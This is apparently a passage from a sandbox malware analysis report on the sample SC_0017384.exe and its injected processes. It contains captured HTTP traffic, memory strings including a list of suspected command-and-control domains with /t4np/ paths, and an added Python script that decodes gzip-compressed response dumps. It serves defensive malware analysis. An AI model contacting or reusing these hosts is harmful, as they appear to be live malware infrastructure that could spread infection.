          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 21 Mar 2023 08:11:52 GMTcontent-type: text/html; charset=utf-8content-length: 9503set-cookie: AWSALB=bCn9G2/gZgmbFRD9758cwynOTqQ9E9t/stGP7SDkLHhiLlKmkgBG0zXzWTyo8dHMcfHREqVTDzkhoikFXH/7EtCcrVka7arDK0bLRf3pG/Q5UxjOrthD8ZihBL5P; Expires=Tue, 28 Mar 2023 08:11:52 GMT; Path=/set-cookie: AWSALBCORS=bCn9G2/gZgmbFRD9758cwynOTqQ9E9t/stGP7SDkLHhiLlKmkgBG0zXzWTyo8dHMcfHREqVTDzkhoikFXH/7EtCcrVka7arDK0bLRf3pG/Q5UxjOrthD8ZihBL5P; Expires=Tue, 28 Mar 2023 08:11:52 GMT; Path=/; SameSite=Noneserver: Apachevary: X-Forwarded-Proto,Accept-Encoding,User-Agentset-cookie: session=fda0h9v5c31k27ncfm8cd5p2ff; path=/; domain=.brunaeleandro.com; secure; SameSite=Nonecontent-encoding: gzipconnection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 7d 5b 73 db c6 96 ee b3 fc 2b da 4c 6d 53 9a 10 20 2e c4 4d 12 ed 72 14 27 e3 94 7c 39 b6 93 7d 66 ab 5c ac 26 d1 24 61 83 00 03 80 ba 24 f1 8f d9 35 0f 53 73 aa e6 e9 d4 79 39 8f c7 7f ec 7c ab 71 21 40 82 12 95 38 79 18 c5 91 80 46 f7 ea 75 5f ab 2f 68 9c 3e fc f6 d5 d9 bb 7f 7b fd 8c cd b3 45 f8 f8 c1 69 fe 87 b1 d3 b9 e0 3e 5d e0 72 21 32 8e e7 d9 52 11 3f af 82 cb 61 e7 2c 8e 32 11 65 ca bb 9b a5 e8 b0 49 7e 37 ec 64 e2 3a eb 13 80 13 36 99 f3 24 15 d9 70 95 4d 15 b7 c3 fa 12 64 18 44 1f 59 22 c2 61 27 9d c7 49 36 59 65 2c 40 e3 0e 9b 27 62 3a ec f4 fb 13 3f 52 78 8a 76 a9 12 8a 19 9f dc a8 13 9e f2 44 9d c4 8b fe 94 5f 52 65 15 bf 9e 5c 0e 0d 09 f3 34 0b b2 50 3c 7e fd f9 9f b3 20 e2 2c fa fc ef 31 13 11 e1 93 70 9f b3 df d8 59 d9 fc b4 9f 57 7d 90 13 13 f1 85 18 76 2e 03 71 b5 04 22 35 12 ae 02 3f 9b 0f 7d 81 be 84 22 6f 7a 2c 88 82 2c e0 a1 92 4e 78 28 86 ba aa 75 1e 3f 78 50 b2 25 87 34 8b e3 59 28 94 34 c8 84 72 29 92 60 1a 4c 78 16 10 69 15 e4 ef 5f 5c 67 8b 6f ff 1e 3c 7d 75 a9 bc 5d 0d 7e f1 94 f4 c7 a7 37 3f fc f0 f2 c7 ef b3 70 7e f3 d3 37 2f 56 df 70 f3 4c 9f fe 9c 4a da a8 87 74 92 04 cb 8c a5 c9 64 d8 21 fe a7 c7 fd fe 38 51 01 4f 24 cb 24 48 85 7a 15 
8c 53 62 4a dc 1f f3 28 12 89 fa 21 7d 42 58 3c f7 87 8e 6b 69 9e d0 34 c5 b1 1d 5f 19 98 86 ad 78 96 e1 29 53 cd b7 0c 73 e2 ea a6 33 e9 3c 3e ed e7 9d a0 c3 07 ad fd 89 c5 58 f8 6a 06 49 4f e3 64 21 45 91 17 7d 48 1b ad 4f 1f 2a 0a fb d7 77 2f ce 2d f6 76 1e 2c 18 8f 7c f6 46 a4 cb 38 a2 aa ec f9 33 97 a5 ab 25 b1 9b c5 d3 a2 a2 08 c5 02 c4 a4 b2 f2 42 f8 01 67 3f af c0 3e 91 32 45 79 2c 41 5e 04 53 16 66 68 ce bc f7 Data Ascii: }[s+LmS .Mr'|9}f\&$a$5Ssy9|q!@8yFu_/h>{Ei>]r!2R?a,2eI~7d:6$pMdDY"a'I6Ye,@'b:?RxvD_Re\4P<~ ,1pYW}v.q"5?}"oz,,Nx(u?xP%4Y(4r)`Lxi_\go<}u]~7?p~7/VpLJtd!8QO$$HzSbJ(!}BX<ki4_x)Ss3<>XjIOd!E}HO*w/-v,|F83%Bg?>2Ey,A^Sfh
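Each HTTP response above is stored as one flattened line: the status line and headers run together, then the body as a "Data Raw" hex dump and a "Data Ascii" rendering. For chunked responses the dump starts with the chunk-size line (the 404 with CF-RAY 7ab4ba77cf4a2c63-FRA begins "64 34 0d 0a", i.e. "d4\r\n", one 212-byte chunk), and for the three gzip-encoded responses the Data Ascii column is compressed bytes forced into characters, so the page content is invisible. Only the first gzip response (CF-RAY 7ab4ba46084491e3-FRA) is a complete member with a final block and the 8-byte trailer; the 7ab4ba77cf4a2c63-FRA chunk stops at a deflate sync flush (00 00 ff ff) with no trailer, and the 200 OK from the brunaeleandro.com host is cut well short of its 9503-byte content-length, so the stock gzip decoder rejects both. The script below is an added example and not part of the Joe Sandbox report: it strips the chunk framing, inflates with a lenient zlib decompressor, and shows why a strict decoder fails. The 404 page used as sample input is constructed (modelled on the plain-text Apache 404 row above), and REPORT_ROW carries the 7ab4ba77cf4a2c63-FRA hex dump copied verbatim with its header list reduced to the two fields the decoder reads.

```python
import gzip
import re
import zlib

# Constructed 404 page in the Apache default layout (compare the report's plain-text 404 row).
SAMPLE_HTML = (
    b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n'
    b"<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n"
    b"<p>The requested URL was not found on this server.</p>\n</body></html>\n"
)

# Copied from the report's 404 row with CF-RAY 7ab4ba77cf4a2c63-FRA: headers reduced to
# the two fields the decoder reads, Data Raw bytes verbatim (one chunk of 0xd4 bytes).
REPORT_ROW = (
    "HTTP/1.1 404 Not FoundTransfer-Encoding: chunkedContent-Encoding: gzipData Raw: "
    "64 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe "
    "8a a5 77 b2 29 ea 81 c3 6a 25 68 52 51 29 94 08 dc 03 47 83 17 b9 52 1b "
    "1b 7b db 88 bf 47 49 85 c4 75 e6 cd 68 86 6e 9a 97 b5 7d ef 5b 78 b2 cf "
    "1d f4 fb c7 6e bb 86 c5 2d e2 b6 b5 1b c4 c6 36 57 e7 ae aa 11 db dd 82 "
    "0d 05 3d 1d 99 82 38 cf 86 f4 a0 47 e1 55 bd 82 5d 54 d8 c4 f3 e0 09 af "
    "a2 21 9c 21 fa 88 fe 67 ca 2d f9 1f 13 96 6c 28 b1 0d 02 59 be cf 52 54 "
    "3c ec 5f 3b 18 5d 81 21 2a 7c 4d 1c c4 01 34 1c 0a 14 c9 17 c9 15 61 9a "
    "9a 32 1b 72 de 67 29 85 1f 92 fb 0c 02 6f 33 00 4e 61 1c c7 ea 24 ea f4 "
    "52 b9 94 a0 8f 59 e1 be 26 fc 0b 18 c2 79 11 e1 fc c4 fc 02 00 00 ff ff "
    "0d 0a"
)

HEX_RE = re.compile(r"Data Raw: ((?:[0-9a-f]{2} ?)+)")


def data_raw_bytes(row: str) -> bytes:
    """The hex dump after 'Data Raw:' in a flattened report row, as bytes."""
    m = HEX_RE.search(row)
    if not m:
        raise ValueError("row has no Data Raw field")
    return bytes.fromhex(m.group(1).strip())


def dechunk(raw: bytes) -> bytes:
    """Undo chunked transfer-encoding; a capture cut before the 0-length chunk is fine."""
    out, pos = bytearray(), 0
    while pos < len(raw):
        eol = raw.find(b"\r\n", pos)
        if eol < 0:
            break
        size = int(raw[pos:eol].split(b";", 1)[0], 16)  # ignore any chunk extension
        if size == 0:
            break
        out += raw[eol + 2 : eol + 2 + size]
        pos = eol + 2 + size + 2  # step over the CRLF that closes the chunk
    return bytes(out)


def inflate_lenient(data: bytes) -> bytes:
    """Inflate a gzip member even without its final block and trailer: a sync-flushed
    stream (ends in 00 00 ff ff) comes back whole, one cut mid-block yields its prefix."""
    d = zlib.decompressobj(16 + zlib.MAX_WBITS)
    return d.decompress(data) + d.flush()


def strict_gunzip_ok(data: bytes) -> bool:
    """The stock decoder raises EOFError on a member that never reached its end marker."""
    try:
        gzip.decompress(data)
        return True
    except EOFError:
        return False


def recover_body(row: str) -> bytes:
    """Rebuild the response body from one 'HTTP traffic detected' row."""
    body = data_raw_bytes(row)
    if re.search(r"transfer-encoding: chunked", row, re.I):
        body = dechunk(body)
    if re.search(r"content-encoding: gzip", row, re.I):
        body = inflate_lenient(body)
    return body


def unfinished_gzip(data: bytes) -> bytes:
    """Compress like a streaming server that flushed but never finished the member."""
    c = zlib.compressobj(wbits=16 + zlib.MAX_WBITS)
    return c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH)


def chunked(data: bytes) -> bytes:
    return f"{len(data):x}\r\n".encode() + data + b"\r\n"


# Constructed row in the report's layout: status line and headers run together,
# then the hex dump of the single captured chunk.
SAMPLE_ROW = (
    "HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 08:12:10 GMTContent-Type: text/html; "
    "charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzip"
    "Data Raw: " + chunked(unfinished_gzip(SAMPLE_HTML)).hex(" ")
)

if __name__ == "__main__":
    print(recover_body(SAMPLE_ROW).decode("iso-8859-1"))
    print(recover_body(REPORT_ROW).decode("iso-8859-1", "replace"))
```

To apply it to any other row on this page, paste the text from the status line through the end of the hex dump (everything before "Data Ascii:") into recover_body(); the header search is case-insensitive because the 200 OK row writes its headers in lowercase. For the truncated 200 OK you get the leading part of the page only, which is still enough to see what the sandbox's requests to these hosts actually returned.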
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.facebook.com/casarpontocom" target="_blank" title="Facebook/casarpontocom"> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.youtube.com/casarpontocom" target="_blank" title="Youtube/casarpontocom"> equals www.youtube.com (Youtube)
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <iframe src="//www.facebook.com/plugins/like.php?href=https%3A%2F%2Ffacebook.com%2FEventoCasar&width&layout=button_count&action=like&show_faces=false&share=false&height=21&appId=621352837957736" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:21px;" allowTransparency="true"></iframe> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src="https://www.facebook.com/tr?id=912779795420526&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
          Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/
          Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCert
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.0000000002832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
          Source: Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrusted
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
          Source: SC_0017384.exe, 00000000.00000002.381865907.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/
          Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCert
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.0000000002832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
          Source: Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrusted
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://instagram.com/casarpontocom
          Source: Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
          Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.0000000002832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
          Source: SC_0017384.exe, 00000000.00000002.382705892.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000026DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.33347.net
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.33347.net/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.33347.netwww.33347.net
          Source: explorer.exe, 00000004.00000003.533668803.000000000ED27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.575675145.0000000000921000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.592015514.000000000ED28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.386129776.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.babupaul.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.babupaul.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.babupaul.comwww.babupaul.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brunaeleandro.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brunaeleandro.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brunaeleandro.comwww.brunaeleandro.com
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.emprendizajesocial.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.emprendizajesocial.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.emprendizajesocial.comwww.emprendizajesocial.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.evelycosmetique.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.evelycosmetique.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.evelycosmetique.comwww.evelycosmetique.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.findmyoriginstory.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.findmyoriginstory.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.findmyoriginstory.comwww.findmyoriginstory.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.funhood.life
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.funhood.life/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.funhood.lifewww.funhood.life
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.groupekoriolis.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.groupekoriolis.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.groupekoriolis.comwww.groupekoriolis.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.icste-conference.org
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.icste-conference.org/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.icste-conference.orgwww.icste-conference.org
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.madisoncountylincoln.com
